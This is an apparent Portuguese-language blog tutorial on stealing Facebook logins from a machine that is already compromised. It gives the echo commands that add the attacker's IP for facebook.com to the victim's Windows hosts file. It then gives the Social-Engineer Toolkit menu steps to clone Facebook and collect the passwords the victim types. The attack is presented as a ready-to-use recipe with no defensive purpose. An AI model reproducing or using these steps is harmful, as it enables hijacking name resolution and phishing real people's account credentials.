Hackeando Facebook após uma invasão

Após uma invasão você tem milhares de coisas que pode fazer, nesse caso simula um exemplo em já se tinha invadido o alvo e o hacker esta se conectando novamente, então as partes anteriores do Teste de invasão foram omitidas. Então vamos lá.
 
Com o comando echo iremos escrever na ultima linha o ip do atacante e o site que queremos roubar a autenticação, faremos isso para que quando a nossa vitima digitar em seu navegador o endereço que especificamos ela sera redirecionada para o nosso ip. Usaremos o hosts que é um arquivo do computador utilizado pelo sistema operacional destinado a relacionar os hostnames e endereços ip,
ele esta dentro de C:/WINDOWS/system32/drivers/etc/
 
Comandos: 


1: echo 192.168.0.102 http://www.facebook.com >> C:\\WINDOWS\\system32\\drivers\\etc\\hosts 2: echo 192.168.0.102 pt-br.facebook.com >> C:\\WINDOWS\\system32\\drivers\\etc\\hosts

 
Vamos verificar o arquivo host: 
 
Comando:
 
1:  type C:\\WINDOWS\\system32\\drivers\\etc\\hosts   
 
Uma vez que ocorreu tudo ok podemos abrir uma nova aba e usar o setoolkit para clonar o nosso site as opções são 1 2 3 2, você digita o seu ip o site que quer clonar.
 
 root@kali~# setookit  
 1) Social-Engineering Attacks  
 2) Website Attack Vectors  
 3) Credential Harvester Attack Method   
 2) Site Cloner  
 192.168.0.102  
 https://www.facebook.com  
O Set vai mandar tudo para o diretorio /var /www/ ele gera 3 arquivos.
 
Quando o alvo digitar http://www.facebook.com ele sera direcionado para o nosso ip que por sua vez está com o facebook clonado
Vualá após a vitima logar você terá as credências dentro do arquivo harverster_* 😀
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s